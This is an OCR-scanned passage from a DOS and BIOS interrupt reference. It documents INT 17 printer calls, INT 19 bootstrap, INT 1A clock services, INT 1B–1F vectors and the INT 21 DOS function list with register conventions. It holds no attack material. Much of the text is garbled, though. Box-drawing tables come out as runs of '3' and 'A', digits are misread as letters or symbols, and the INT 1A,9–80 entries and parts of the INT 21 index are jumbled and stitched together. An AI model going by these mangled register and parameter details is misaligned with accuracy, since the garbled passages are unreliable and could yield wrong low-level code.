- on the AT, XT 286, and PS/2 when the BIOS determines the printer 
is busy, -INT 15,90- is executed 
- all printers do not return reliable status information; bit 3 and 
bit 7 are usually reliable. 
all registers are preserved except AH 
‘int 17, (0) 
AINT 17,0 - Print Character 


AH = 00 

AL = character to print 

DX = printer to be used (0-2) 
on return: 


AH = printer status, see —INT 17,STATUS- 


- writes character and returns status 
‘int 17,1 
NINT 17,1 - Initialize Printer Port 


AH = 01 
DX = printer port to initialize (0-2) 
on return: 


AH = status, see -INT 17, STATUS- 


- initializes printer port and returns status 

- outputs characters 0x08 and ©Ox0C to printer port which 
reset -Epson- and IBM printers, but may produce undesirable 
effects on other printers 


‘int 17,2 
NINT 17,2 - Read Printer Port Status 
AH = 02 
DX = printer port to be used (0-2) 
on return 
AH = status 


6353433323130 Printer status bits 
3 3 3 3 3 3 AAAAA time out 

3 s 3 3 AAAAAAAA unused 

3 3 3 AAAAAAAAA T/0 error 

3 3 AAAAAAAAAA selected 

3 AAAAAAAAAAA out of paper 
“AAAAAAAAARAA acknowledge 
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- returns status of specified printer port 
sint 19 
NAINT 19 - Bootstrap Loader 


DL = physical drive where boot sector is located 


no output 


- track 0, sector 1 is loaded into address 0:7C00 
and control is transferred there 

- not a preferred method for rebooting by applications. A 
better method is to set the word at location 40:72 to 1234h 
and jump to location FFFF:0 in ROM 

- memory is not cleared when rebooted through this interrupt 


- see -WARM BOOT- 


‘int 1a:BIOS clock services 
NAINT 1A - System and Real Time Clock BIOS Services 


% For more informations, see the following topics: 


-INT 1A, 0- Read system clock counter 

-INT 1A, 1- Set system clock counter 

-INT 1A, 2- Read real time clock time (AT,PS/2) 

-INT 1A,3- Set real time clock time (AT,PS/2) 

-INT 1A, 4- Read real time clock date (AT,PS/2) 

-INT 1A, 5- Set real time clock date (AT,PS/2) 

-INT 1A, 6- Set real time clock alarm (AT,PS/2) 

-INT 1A, 7- Reset real time clock alarm (PS/2) 

-INT 1A,8- Set RTC activated power on mode (convertible,PS/2) 
-INT 1A,9- Read RTC alarm time and status (convertible,PS/2) 
-INT 1A, A- Read system day counter (PS/2) 

-INT 1A, B- Set system day counter (PS/2) 

-INT 1A,80- Set up sound multiplexer (PCjr only) 


- function is specified in register AH 
- see -RTC- 

:int 1a,0 

AINT 1A,0 - Read System Clock Counter 


AH = 00 
on return: 
AL midnight flag, 1 if 24 hours passed since reset 


high order word of tick count 
low order word of tick count 


(©) 
x 
H Hu 


- incremented approximately 18.206 times per second 
- at midnight CX:DX is zero 
- this function can be called in a program to assure the date is 
updated after midnight; this will avoid the passing two midnights 
date problem 
:int 1a,1 
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AINT 1A,1 - Set System Clock Counter 


AH = 01 
CX = high order word of tick count 
DX = low order word of tick count 


returns nothing 


- CX:DX should be set to the number of seconds past 
midnight multiplied by approximately 18.206 


:int 1a,2 
AINT 1A,2 - Read Time From Real Time Clock (XT 286,AT,PS/2) 


AH = 02 
on return: 
CF 0 if successful 


1 if error, -RTC- not operating 


CH = hours in BCD 

CL = minutes in BCD 

DH = seconds in BCD 

DL = 1 if daylight savings time option 


- on AT with BIOS before 6/10/85, DL is not returned 
:int 1a,3 
AINT 1A,3 - Set Time on Real Time Clock (XT 286,AT,PS/2) 


AH = 03 

CH = hours in BCD 

CL = minutes in BCD 

DH = seconds in BCD 

DL = 1 if daylight savings time option 


© if standard time 


returns nothing 


- clock values must be in BCD 
- see -RTC- 
:int 1a,4 
AINT 1A,4 - Read Real Time Clock Date (XT 286,AT,PS/2) 


AH = 04 

on return: 

CH = century in BCD (decimal 19 or 20) 
CL = year in BCD 

DH = month in BCD 

DL = day in BCD 

CF = 0 if successful 


1 if error or clock not operating 
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- calling this interrupt will update the DOS maintained date and 
reset the -BIOS Data Area- date rollover flag at 40:70 
- see -RTC- 
‘int 1a,5 
AINT 1A,5 - Set Real Time Clock Date (XT 286,AT,PS/2) 


AH = 05 

CH = century in BCD (decimal 19 or 20) 
CL = year in BCD 

DH = month in BCD 

DL = day in BCD 


returns nothing 


- all values must be in BCD 
- see -RTC- 
:int 1a,6 
AINT 1A,6 - Set Real Time Clock Alarm (XT 286,AT,PS/2) 


AH = 06 

CH = hours in BCD 
CL = minutes in BCD 
DH = seconds in BCD 
on return: 


CF = 1 if alarm already set or clock inoperable 


- alarm setting is not relative like some sources claim, but the 
actually clock time the interrupt should occur 
- settings values must be in BCD 
- when the alarm time is reached -INT 4A- is executed 
- INT 4A vector should be replaced with address of the alarm 
handling interrupt routine before setting the alarm 
- «INT 1A,7- should be called to disable the -RTC- alarm 
:int 1a,7 
AINT 1A,7 - Disable Real Time Clock Alarm (XT,AT,PS/2) 


returns nothing 


- should be called previous to setting or resetting the 
-RTC- alarm with -INT 1A, 6- 
:int 1a,8 
AINT 1A,8 - Set RTC Activated Power On Mode (convertible) 


AH = 08 

CH = hours in BCD 
CL = minutes in BCD 
DH = seconds in BCD 
- see -RTC- 
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:int 1a,9 
AINT 1A,9 - Read RTC Alarm Time and Status (convertible,PS/2) 


sint 
AINT 


sint 
AINT 


sint 
AINT 


sint 
AINT 


on 


1a, 
1A, 


AH 


on 
CX 


1a, 
1A, 


= 09 

return: 

= hours in BCD 

= minutes in BCD 

= seconds in BCD 

= alarm status: 

= 00 if alarm not enabled (AIE=0) 

= 01 if alarm enabled but will not power up system (AIE=1) 
= 02 if alarm will power up system (AIE=1) 
see -RTC- 

a 
A - Read System Day Counter (PS/2) 

= OAh 

return: 

= count of days since 1-1-1980 

b 

B - Set System Day Counter (PS/2) 

= OBh 

= count of days since 1-1-1980 

80 

80 - Setup Sound Multiplexer (PCjr only) 


00 - source is -8253- channel 2 

01 - source is cassette input 

02 - source is I/0 channel "AUDIO IN" 
03 - source is sound generator chip 


Ctrl-Break:BIOS break interrupt 
- BIOS Ctrl-Break Handler Address 


holds address of the BIOS Ctrl-Break interrupt handler 

called by -INT 9- after Ctrl-Break key is pressed; INT 9 sets the 
BIOS keyboard head and tail pointers to the buffer start and 
places a zero word in the buffer 

the BIOS initially sets this value to point to a simple -IRET- but 
DOS re-vectors this to its own code, usually 2 lines of code that 
sets an internal flag (to 3) and then returns via IRET. 

DOS checks this flag on entry to many of its subfunctions. If the 
flag is set, it invokes -INT 23-. 

pointing this address to a null function with and IRET disables 
Ctrl-Break aborts 

if the INT 1B code chooses to retain control of the system, it 
must issue an EOI for any interrupt pending on the -8259- and reset 
all I/0 devices 

should be terminated via an IRET 
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sint lc: 


NINT 1C 


sint le 
AINT 1E 


should not be called directly by user application 
user timer routine 
- System Timer Tick (User Routine) 


called by -INT 8-, approximately 18.206 times per second 

(unless the program modifies the -8253- PIT 

this is a user routine which the BIOS defaults to a simple -IRET- 
this interrupt vector can be used for TSR popup utilities, 
animated graphics updates and event polling 

since many TSR's don't maintain the integrity of the interrupt 
call chain, relying on this for TSR popup isn't recommended 


- Video Initialization Parameter Table Vector 

not a true interrupt, but a far pointer to a video 
initialization parameter table for video controllers 

- Disk Initialization Parameter Table Vector 

not an interrupt, but a far pointer to the diskette base table 


this table contains initialization parameters for the disk 
controller used during formatting, reading, and writing to a disk 


% Disk Initialization Parameter Table Vector Definition: 


% Offset Description 


00 37363534333231303 Disk Controller Mode byte 1 
3 3 3 3 AAAAAAAAAAA head step rate in milliseconds (0-F) 
AAAAAAAAAAAAAAAAAA head unload time in milliseconds (0-F) 


01 37363534333231303 Disk Controller Mode byte 2 
3 s 3 s 3 s 3 AAAAA DMA flag (0 = use DMA) 
AAAAAAAAAAAAAAAAAA (head load time/2)-1 in milliseconds 


02 clock ticks until motor off 
03 FM or MFM Mode: Log2 (Bytes per Sector/128) 
FM=Frequency Modulation used on single-density disks 
MFM=Modified Frequency Modulation used on double-sided disks 
04 last sector on track 
05 gap length in bytes: 


Bytes Per Sectors Write Format 
MFM Sector Per Track Gap Gap 
1 256 18 OAh — OCh 
1 256 16 20h 32h 
2 512 8 2Ah 50h 
2 512 9 1Bh  6Ch 
3 1024 4 80h Fon 
4 2048 2 C8h_FFh 
5 4096 1 C8h_FFh 


06 disk data length 
80h for 128 bytes/sector 
FFh otherwise 
07 gap length when formatting 
08 data pattern used during formatting 
09 floppy head bounce delay (in milliseconds) 
0A floppy motor start delay (in 0.125 second intervals) 
OB floppy motor stop delay (in 0.25 second intervals) 
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- see -INT 13, 18- 


sint 1f 
AINT 1F - Graphics Display Character Bit Map Table 


- not a true interrupt, but a far pointer to a table of 
character bit maps for the graphics mode representation of 
ASCII characters 128 through 255 

- can be used to change character fonts in CGA graphics mode 


:DOS interrupts 
ADOS Interrupt Summary 


% See the following topics for more information: 


-INT 20- Program terminate 

-INT 21- DOS Function Dispatcher 

-INT 22- Program Terminate 

-INT 23- Ctl-break exit address 

-INT 24- Critical error handler address 

-INT 25- Absolute disk read 

-INT 26- Absolute disk write 

-INT 27- Terminate but stay resident 

-INT 28- DOS idle loop/scheduler (undocumented) 
-INT 29- Fast character output (undocumented) 
-INT 2E- Execute command using base level COMMAND.COM (undoc. ) 
-INT 2F- Multiplex interrupt (DOS 3.x+) 


sint 20 
AINT 20 - Program Terminate 


CS = address of -PSP- 


returns nothing 


- INT 20 restores the terminate, -Ctrl-Break-, and critical error 
exit addresses from values in the PSP, flushes all buffers, frees 
memory and returns to DOS via the termination handler address 

- does not close -FCB-s 

- this function is no longer recommended, but can be used by 
version of DOS before 2.0, see -INT 21,4C- and -INT 21,0- 


sint 21:DOS services:DOS functions 
AINT 21 - DOS Function Dispatcher 


AFor more information, see the following topics: 


-INT 21,0- Program terminate 

-INT 21,1- Keyboard input with echo 

-INT 21,2- Display output 

-INT 21,3- Wait for auxiliary device input 

-INT 21,4- Auxiliary output 

-INT 21,5- Printer output 

-INT 21,6- Direct console 1/0 

-INT 21,7- Wait for direct console input without echo 
-INT 21,8- Wait for console input without echo 

-INT 21,9- Print string 
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-INT 21,A- Buffered keyboard input 

-INT 21,B- Check standard input status 

-INT 21,C- Clear keyboard buffer, invoke keyboard function 
-INT 21,D- Disk reset 

-INT 21, E- Select disk 

-INT 21,F- Open file using -FCB- 

-INT 21,10- Close file using FCB 

-INT 21,11- Search for first entry using FCB 

-INT 21, 12- Search for next entry using FCB 

-INT 21, 13- Delete file using FCB 

-INT 21,14- Sequential read using FCB 

-INT 21, 15- Sequential write using FCB 

-INT 21, 16- Create a file using FCB 

-INT 21,17- Rename file using FCB 

-INT 21, 18- DOS dummy function (CP/M) (not used/listed) 
-INT 21,19- Get current default drive 

-INT 21, 1A- Set disk transfer address 

-INT 21, 1B- Get allocation table information 

-INT 21, 1C- Get allocation table info for specific device 
-INT 21, 1D- DOS dummy function (CP/M) (not used/listed) 
-INT 21, 1E- DOS dummy function (CP/M) (not used/listed) 
-INT 21, 1F- Get pointer to default drive parameter table (undocumented) 
-INT 21,20- DOS dummy function (CP/M) (not used/listed) 
-INT 21,21- Random read using -FCB- 

-INT 21,22- Random write using FCB 

-INT 21,23- Get file size using FCB 

-INT 21, 24- Set relative record field for FCB 

-INT 21, 25- Set interrupt vector 

-INT 21, 26- Create new program segment 

-INT 21,27- Random block read using FCB 

-INT 21,28- Random block write using FCB 

-INT 21,29- Parse filename for FCB 

-INT 21,2A- Get date 

-INT 21,2B- Set date 

-INT 21,2C- Get time 

-INT 21,2D- Set time 

-INT 21,2E- Set/reset verify switch 

-INT 21,2F- Get disk transfer address 

-INT 21,30- Get DOS version number 

-INT 21,31- Terminate process and remain resident 

-INT 21,32- Get pointer to drive parameter table (undocumented) 
-INT 21,33- Get/set -Ctrl-Break- check state & get boot drive 
-INT 21,34- Get address to DOS critical flag (undocumented) 
-INT 21,35- Get vector 

-INT 21,36- Get disk free space 

-INT 21,37- Get/set switch character (undocumented) 
-INT 21,38- Get/set country dependent information 

-INT 21,39- Create subdirectory (mkdir) 

-INT 21,3A- Remove subdirectory (rmdir) 

-INT 21,3B- Change current subdirectory (chdir) 

-INT 21,3C- Create file using handle 

-INT 21,3D- Open file using handle 

-INT 21,3E- Close file using handle 

-INT 21,3F- Read file or device using handle 

-INT 21,40- Write file or device using handle 

-INT 21,41- Delete file 

-INT 21,42- Move file pointer using handle 

-INT 21,43- Change file mode 

-INT 21,44- 1/0 control for devices (-IOCTL-) 

-INT 21,45- Duplicate file handle 

-INT 21,46- Force duplicate file handle 

-INT 21,47- Get current directory 

-INT 21,48- Allocate memory blocks 
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-I 
-I 
=I 
=I 
1 
=I 
-I 
=I 
-I 
I 
-I 
I 
-I 
=I 
-I 
-I 
I 
-I 
-I 
I 
I 
-I 
=I 
=I 
-I 
-I 
sI 
I 
I 
-I 
-I 
-I 
=1 
=I 
-I 
=I 


:int 21, 
NINT 21, 


AH 
CS 


re 
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NT 21,49- Free allocated memory blocks 
NT 21,4A- Modify allocated memory blocks 


NT 21,4B- EXEC load and execute program (func 1 undocumented) 


NT 21,4C- Terminate process with return code 

NT 21,4D- Get return code of a sub-process 

NT 21,4E- Find first matching file 

NT 21,4F- Find next matching file 

NT 21,50- Set current process id (undocumented) 

NT 21,51- Get current process id (undocumented) 

NT 21,52- Get pointer to DOS "INVARS" (undocumented) 
NT 21,53- Generate drive parameter table (undocumented) 
NT 21,54- Get verify setting 

NT 21,55- Create -PSP- (undocumented) 

NT 21,56- Rename file 

NT 21,57- Get/set file date and time using handle 


NT 21,58- Get/set memory allocation strategy (3.x+, undocumented) 


NT 21,59- Get extended error information (3.x+) 

NT 21,5A- Create temporary file (3.x+) 

NT 21,5B- Create new file (3.x+) 

NT 21,5C- Lock/unlock file access (3.x+) 

NT 21,5D- Critical error information (undocumented 3.x+) 

NT 21,5E- Network services (3.1+) 

NT 21,5F- Network redirection (3.1+) 

NT 21,60- Get fully qualified file name (undocumented 3.x+) 
NT 21,62- Get address of program segment prefix (3.x+) 

NT 21,63- Get system lead byte table (MSDOS 2.25 only) 

NT 21,64- Set device driver look ahead (undocumented 3.3+) 
NT 21,65- Get extended country information (3.3+) 

NT 21,66- Get/set global code page (3.3+) 

NT 21,67- Set handle count (3.3+) 

NT 21,68- Flush buffer (3.3+) 


NT 21,69- Get/set disk serial number (undocumented DOS 4.0+) 


NT 21,6A- DOS reserved (DOS 4.0+) 
NT 21,6B- DOS reserved 
NT 21,6C- Extended open/create (4.x+) 


NT 21,F8- Set OEM INT 21 handler (functions F9-FF) (undocumented) 


int 21 functions are called with the function number in AH 

register AX may be altered, its contents are not guaranteed 
if an error occurs, CF is set to 1 and AX contains a simple 
error code; -INT 21,59- can be used to determine cause. 


most INT 21 functions do not restore the flags to pre-interrupt 
state to allow returning of information via the flags register 


(0) 
O - Program Terminate 


00 
-PSP- segment address 


turns nothing 


restores the terminate, -Ctrl-Break-, and critical error 
exit addresses, flushes all buffers, frees memory 

and returns to DOS via the termination handler address 
does not close -FCB-s 

this function is no longer recommended, but can be used by 
version of DOS before 2.0, see -—-INT 21,4C- and -INT 20- 
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:int 21,1 
AINT 21,1 - Keyboard Input with Echo 


on return: 
AL = character from standard input device 


- waits for keyboard input from STDIN and echoes to STDOUT 
- returns 0 for extended keystroke, then function must be 


called again to return scan code 
- if -Ctrl-Break- is detected, -INT 23- is executed 


‘int 21,2 
AINT 21,2 - Display Output 


AH 
DL 


02 
character to output 


returns nothing 


- outputs character to STDOUT 
- backspace is treated as non-destructive cursor left 
- if -Ctrl-Break- is detected, -INT 23- is executed 


‘int 21,3 
AINT 21,3 - Wait for Auxiliary Device Input 


on return: 
AL = character from the auxiliary device 


- does not supply error returns 
- waits for character and reads from STDAUX 
- default DOS AUX parameters are 2400,N,8,1 


‘int 21,4 
AINT 21,4 - Auxiliary Output 


AH 
DL 


04 
character to output 


returns nothing 


- sends character in DL to STDAUX 

- does not supply error returns 

- waits until STDAUX is available 

- default DOS AUX parameters are 2400,N,8,1 


:int 21,5 
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AINT 21,5 - Printer Output 


AH 
DL 


05 
character to output 


returns nothing 


- sends character in DL to STDPRN 
- waits until STDPRN device is ready before output 


:int 21,6 
NINT 21,6 - Direct Console I/0 
AH = 06 
DL = (0-FE) character to output 
= FF if console input request 
on return: 
AL = input character if console input request (DL=FF) 
ZF = 0 if console request character available (in AL) 
=1 if no character is ready, and function request 


was console input 


- reads from or writes to the console device depending on 
the value of DL 

- cannot output character FF (DL=FF indicates read function) 

- for console read, no echo is produced 

- returns 0 for extended keystroke, then function must be 
called again to return scan code 

- ignores Ctrl-Break and Ctrl-PrtSc 


:int 21,7 
AINT 21,7 - Direct Console Input Without Echo 


on return: 
AL = character from STDIN 


- waits for keyboard input until keystroke is ready 

- character is not echoed to STDOUT 

- returns 0 for extended keystroke, then function must be 
called again to return scan code 

- ignores Ctrl-Break and Ctrl-PrtSc 

- see -INT 21,1- 


:int 21,8 
AINT 21,8 - Console Input Without Echo 


on return: 
AL = character from STDIN 
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- returns 0 for extended keystroke, then function must be 
called again to return scan code 

- waits for character from STDIN and returns data in AL 

- if -Ctrl-Break- is detected, -INT 23- is executed 


sint 21,9 
AINT 21,9 - Print String 


AH = 09 
DS:DX = pointer to string ending in "$" 


returns nothing 


- outputs character string to STDOUT up to "$" 
- backspace is treated as non-destructive 
- if -Ctrl-Break- is detected, -INT 23- is executed 


‘int 21,a 
NAINT 21,A - Buffered Keyboard Input 


AH = 0A 
DS:DX = pointer to input buffer of the format: 


3 max 3 count 3 BUFFER (N bytes) 
3 3 AAAAAAA input buffer 
3 AAAAAAAAAAAAA number of characters returned (byte) 
AAAAAAAAAAAAAAA maximum number of characters to read (byte) 


returns nothing 


- since strings can be pre-loaded, it is recommended that the 
default string be terminated with a CR 

- N bytes of data are read from STDIN into buffer+2 

- max buffer size is 255, minimum buffer size is 1 byte 

- chars up to and including a CR are placed into the buffer 
beginning at byte 2; Byte 1 returns the number of chars 
placed into the buffer (extended codes take 2 characters) 

- DOS editing keys are active during this call 

- -INT 23- is called if Ctrl-Break or Ctrl-C detected 


:int 21,b 
NAINT 21,B - Check Standard Input Status 


AH = OB 
on return: 
AL 00 if no character available 


FF if character available 


- checks STDIN for available characters 
- character is not returned 
- if Ctrl-Break is detected -INT 23- is executed 


sint 21,c 
NAINT 21,C - Clear Keyboard Buffer and Invoke Keyboard Function 
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AH = OC 
AL = 01, 06, 07, 08 or 0A (INT 21 input functions) 
on return: 


see return values from INT 21,AL where AL is 1, 6, 7, 8 or A 


- main function is to clear the input buffer and call INT 21h with 
the specified function (in AL) 
- see -INT 21,1-, -INT 21,6-, -INT 21,7-, -INT 21,8- & -INT 21, A- 


:int 21,d 
NINT 21,D - Disk Reset 


returns nothing 


- all file buffers are flushed to disk 
- does NOT update directory entry 


:int 21,e 
NINT 21, E - Select Disk 


AH 
DL 


OE 
zero based, drive number (0-25, A: - Z:) 


on return: 


AL = one based, total number of logical drives including 
hardfiles (1-26) 


- for DOS 3.x+, this function returns the number of logical 
drives or the value of LASTDRIVE (default of 5) in the 
CONFIG.SYS file 


:int 21,f 
AINT 21,F - Open a File Using FCB 


AH = 0F 
DS:DX = pointer to unopened -FCB- 


on return: 
AL = 00 if file opened 
= FF if unable to open 


- opens an existing file using a previously setup FCB 

- the FCB fields drive identifier, filename and extension 
must be filled in before call 

- sets default FCB fields; current block number is set to 0; 
record size is set to 80h; file size, date and time are set 
to the values from the directory 

- does not create file, see -INT 21,16- 
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- DOS 2.x allows opening of subdirectories, DOS 3.x does not 
:int 21,10 
AINT 21,10 - Close a File Using FCB 


AH = 10h 
DS:DX = pointer to opened -FCB- 


on return: 
AL 00 if file closed 
FF if file not closed 


- closes a previously opened file opened with an FCB 
- FCB must be setup with drive id, filename, and extension 
before call 


:int 21,11 
AINT 21,11 - Search for First Entry Using FCB 


AH = 11h 
DS:DX = pointer to unopened -FCB- 


on return: 
AL = 00 if matching file found 
= FF if file not found 


- searches for first occurrence of filename specified in FCB 

- FCB must have drive id, filename, and extension before call 

- extended FCB can be used to specify a search criteria based 
on attributes; hidden, system, label, and directory attributes 
can be used to narrow the search (see -FILE ATTRIBUTES-) 

- after successful call DTA holds an unopened -FCB-/-XFCB- for 
the requested file. Using any of the other FCB functions 
destroys this -DTA- copy of the FCB/XFCB 

- searching can be continued with the FCB find-next function 

- "2?" wildcard supported after DOS 2.1, "*" supported in DOS 3.x 

- DOS 2.x can't find . and .. entries, DOS 3.x can (unless in root) 

- see -INT 21,12- 


sint 21,12 
AINT 21,12 - Search for Next Entry Using FCB 


AH = 12h 
DS:DX = pointer to unopened -FCB- returned from 
-INT 21,11- or -INT 21,12- 


on return: 
AL 00 if file found 
FF if file not found 


- finds next matching file after calls to -INT 21,11- and 
-INT 21,12- 
- FCB should be the same across calls to INT 21,11 and 12 
- after successful call -DTA- holds an unopened -FCB-/-XFCB- for 
the requested file. Using any of the other FCB functions 
destroys this DTA copy of the FCB/XFCB 
:int 21,13 
AINT 21,13 - Delete File Using FCB 


Pagina 913 di 991 


AH = 13h 
DS:DX = pointer to an unopened -FCB- 


on return: 
AL = 00 if file deleted 


‘int 21, 
NINT 21, 


= FF if file not found 


deletes unopened file with normal attributes 

FCB must contain drive id, filename, and extension before call 
"?" wildcard supported after DOS 2.1, "*" supported by DOS 3.x+ 
DOS 2.x allowed deletion of a subdirectory if -XFCB- was provided, 
even if files existed, causing lost clusters. DOS 3.x does not 
14 

14 - Sequential Read Using FCB 


AH = 14h 
DS:DX = pointer to an opened -FCB- 


on 


:int 21, 
NINT 21, 


= 00 if successful read 

= 01 if end of file (no data read) 

= 02 if -DTA- is too small 

= 03 if end of file or partial record read 


reads a record from file pointed to by FCB at the location 
specified in current block and current record number 

data record is read into the DTA 

FCB record number is updated 

15 

15 - Sequential Write Using FCB 


= 15h 
:DX = pointer to an opened -FCB- 


return: 

00 if write was successful 

01 if diskette is full or read only 
02 if -DTA- is too small 


- writes a record from the DTA to the current record position 


‘int 21, 
NINT 21, 
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in file specified by the opened FCB 

record size and output location are maintained in the FCB 
16 

16 - Create a File Using FCB 


= 16h 
:DX = pointer to an unopened -FCB- 


return: 
00 if file created 
FF if file creation failed 


991 


- creates file using FCB and leaves open for later output 
- FCB must be setup with drive id, filename, and extension 
before call 
- an extended FCB can be used to also set -file attributes- 
:int 21,17 
AINT 21,17 - Rename a File Using FCB 


AH = 17h 
DS:DX = pointer to a modified -FCB- of the format: 
Offset Description 
00 drive designator 
01 original file name 
09 original file extension 
11 new file name 
19 new extension 
on return: 
AL 00 if file renamed 


FF if file not renamed 


- allows renaming of files with normal attributes 
"?" wildcard supported after DOS 2.1, "*" supported by 
DOS 3.x+ 
sint 21,19 
NINT 21,19 - Get Current Default Drive 


AH = 19h 


on return: 
AL = current default drive (0=A,1=B,etc) 


- determines the current default drive 


:int 21,1a 
NINT 21, 1A - Set Disk Transfer Address (DTA) 


AH = 1A 
DS:DX = pointer to disk transfer address (-DTA-) 


returns nothing 


- specifies the disk transfer address to DOS 
- DTA cannot overlap 64K segment boundary 
- offset 80h in the -PSP- is a 128 byte default DTA supplied 
by DOS upon program load 
- use of the DTA provided by DOS will result in the loss 
of the program command tail which also occupies the 128 
bytes starting at offset 80h of the PSP 
- see -INT 21,2F- 
sint 21,1b 
NINT 21, 1B - Get Allocation Table Information 
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on return: 
= sectors per cluster 
CX = bytes per sector 
= clusters on disk 
DS:BX = pointer to -Media Descriptor Byte- found in -FAT- 


- retrieves information on capacity and format of default drive 
- DS:BX can be used to determine if drive is RAMDISK or removable 
- see -—-INT 21,1C- 


sint 21,1C 
NAINT 21,1C - Get Allocation Table Info for Specified Drive 


AH = 1C 

DL = drive number (0 for default, 1 = A:, Z: = 26) 
on return: 

AL sectors per cluster 


CX = bytes per sector 
= clusters on disk 
DS:BX = pointer to -Media Descriptor Byte- found in -FAT- 


- retrieves information on capacity and format of specified drive 
- DS:BX can be used to determine if drive is RAMDISK or removable 
- see -INT 21, 1B- 


:int 21,1f 
NINT 21, 1F - Get Pointer to Current Drive Parameter Table 
A(Undocumented) 


AH = 1F 
DL = drive number (©0=default, 1=A, ...) 
on return: 


AL = 00 DS:BX is pointer to drive parameter table (-DPT-) 
FF drive does not exist 
DS:BX = pointer to drive parameter table (DPT) if AL=0 


- the format of the DPT varies between DOS versions 
- calls -INT 21,32- with DL=00 for DOS version 2.x+ 
:int 21,21 
NINT 21,21 - Random Read Using FCB 


AH = 21h 
DS:DX = pointer to an opened -FCB- 


= 00 if read successful 

= 01 if EOF (no data read) 

= 02 if -DTA- is too small 

= 03 if EOF (partial record read) 
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- reads random records from a file opened with an FCB 
to the DTA 


- FCB must be setup with drive id, filename, extension, 
record position and record length before call 
- current record position field in FCB is not updated 


:int 21,22 
NINT 21,22 - Random Write Using FCB 


AH = 22h 
DS:DX = far pointer to an opened -FCB- 


on return: 

AL 00 if write successful 

01 if diskette full or read only 
02 if -DTA- is too small 


- write records to random location in file opened with FCB 

- FCB must be setup with drive id, filename, extension, 
record position and record length before call 

- current record position field in FCB is not updated 


sint 21,23 
AINT 21,23 - Get File Size Using FCB 


AH = 23h 
DS:DX = pointer to an unopened -FCB- 


on return: 
AL = 00 if successful 
= FF if file not found 


- determines the number of records in a file 

- FCB must be setup with drive id, complete filename and 
extension plus record length before call 

- updates random record position in FCB located at DS:DX 
with file record count 


:int 21,24 
NAINT 21,24 - Set Relative Record Field in FCB 


AH = 24h 
DS:DX = pointer to an opened -FCB- 


returns nothing 


- modifies opened FCB for random operation 
- sets FCB random record field to current sequential block 
and record fields 


:int 21,25 
NINT 21,25 - Set Interrupt Vector 
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25h 
interrupt number 
DS:DX = pointer to interrupt handler 


returns nothing 
- provides a safe method for changing interrupt vectors 
- see -INT 21,35- 

:int 21,26 


AINT 21,26 - Create New Program Segment Prefix 


AH 
DX 


26h 
segment address of new -PSP- 


returns nothing 


- allocates memory for a PSP and copies current PSP there 

- used before DOS 2.x to spawn a child process 

- the application is responsible for allocating any memory 
necessary for the child process 

- -INT 21,4B- (EXEC) is now the recommended method for starting 
a child process, so this function should be avoided 


- see also -INT 21,55- 
sint 21,27 


NAINT 21,27 - Random Block Read Using FCB 


27h 
number of records to read 
DS:DX = pointer to an opened -FCB- 


on return: 

00 if read was successful 

01 if EOF (no data read) 

02 if -DTA- is too small 

03 if EOF (partial record read) 
actual number of records read 


CX 


- allows random access and sequential reading of a group 
of records from a file opened with an FCB into the DTA 

- FCB must be setup with drive id, filename, extension 
record length and random record number before call 


:int 21,28 
AINT 21,28 - Random Block Write Using FCB 


AH 
CX 


28h 
number of records to write 
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DS:DX = pointer to an opened -FCB- 


on return: 

AL 00 if write successful 

01 if diskette full or read only 
02 if -DTA- is too small 

number of records written 


CX 


- allows random access and sequential writing of a group 
of records from a file opened with an FCB into the DTA 
- FCB must be setup with random record number and record size 
- updates random record number, current block and current 
record fields 


sint 21,29 
NINT 21,29 - Parse a Filename for FCB 
AH = 29h 
AL = bit pattern to control parsing (see bit meanings below) 
DS:SI = pointer to a filespec to parse 
ES:DI = pointer to a buffer for unopened -FCB- 


Bit patterns for parsing control found in AL: 


37363534333231303 AL 

3 3 3 3 3 s 3 AAAAA 1 = ignore leading separators 

Sir SI © = don't ignore leading separators 
3 3 3 3 3 3 AAAAAA 1 = modify drive ID if specified 

Sab e e 0 = modify drive ID regardless 

3 3 3 3 3 AAAAAAA 1 = modify filename if specified 
Siano O = modify filename regardless 

3 3 3 3 AAAAAAAA 1 = modify extension if specified 

3 3 3 3 


0 = modify extension regardless 
I AARAAARARBARAA unused 


on return: 

00 if no wildcard characters present 

01 if wildcards present in string 

FF if drive specifier is invalid 

= pointer to the first character after parsed filename 
= pointer to the updated unopened FCB 


\®) 
v 
QQ Il IN Il 


- retrieves filename from the command line string and places 
the filename components into an unopened FCB for later use 
- if no filename is found a pointer is returned in ES:DI that 
has a blank at ES:DI+1 
- this function can be used to detect the existence of logical DOS 
drives by creating a dummy filespec with a drive letter and colon 
prepended. If the drive is invalid, this function will return FF 
in AL 
:int 21,2a 
AINT 21,2A - Get Date 


on return: 
AL = day of the week (0=Sunday) 
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CX = year (1980-2099) 
DH = month (1-12) 
DL = day (1-31) 


- retrieves system date based on the DOS maintained clock 
- updates —-BIOS Data Area- current date and date rollover flag 
at location 40:70 


‘int 21,2b 
NINT 21,2B - Set Date 


AH = 2B 

CX = year (1980-2099) 
DH = month (1-12) 

DL = day (1-31) 

on return: 


AL = 00 if date change successful 
= FF if invalid date 


- sets DOS maintained clock 
- DOS versions 3.3+ also update the -CMOS- date where applicable 


sint 21,2c 
NINT 21,2C - Get Time 


AH = 2C 

on return: 

CH = hour (0-23) 

CL = minutes (0-59) 

DH = seconds (0-59) 

DL = hundredths (0-99) 


- retrieves DOS maintained clock time 
:int 21,2d 
AINT 21,2D - Set Time 


AH = 2D 

CH = hour (0-23) 

CL = minutes (0-59) 

DH = seconds (0-59) 

DL = hundredths (0-99) 
on return: 


AL = 00 if time change successful 
= FF if time invalid 


- changes DOS maintained clock 
- DOS version 3.3+ also update CMOS clock where applicable 


:int 21,2e 
AINT 21,2E - Set/Reset Verify Switch 
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2E 


AL = 00 to set off 
= 01 to set verify on 
DH = 00 for DOS versions before 3.0 


returns nothing 


- with the verify setting on, disk 1/0 is more secure but 
takes longer to complete 


- see -INT 21,54- 


sint 21,2f 
NINT 21,2F - Get Disk Transfer Address (DTA) 


on return: 
ES:BX = pointer to current -DTA- 


- returns the DTA address 

- the default DTA is a 128 byte block at address 80h in the 
Program Segment Prefix (-PSP-). This area also contains the 
command tail at program startup it must be saved or the DTA 
must be relocated before use to preserve the command tail 


- see -INT 21, 1A- 


sint 21,30 
NINT 21,30 - Get DOS Version Number 


AH = 30h 

on return: 

AL = major version number (2-5) 

AH = minor version number (in hundredths decimal) 

BH = FF indicates MS-DOS, only if OEM vendor chooses to identify 
= 00 indicates PC-DOS 

BL:CX = 24 bit OEM serial number if BH is FF 


- for an example DOS version 2.1 returns AL=2 and AH=10 

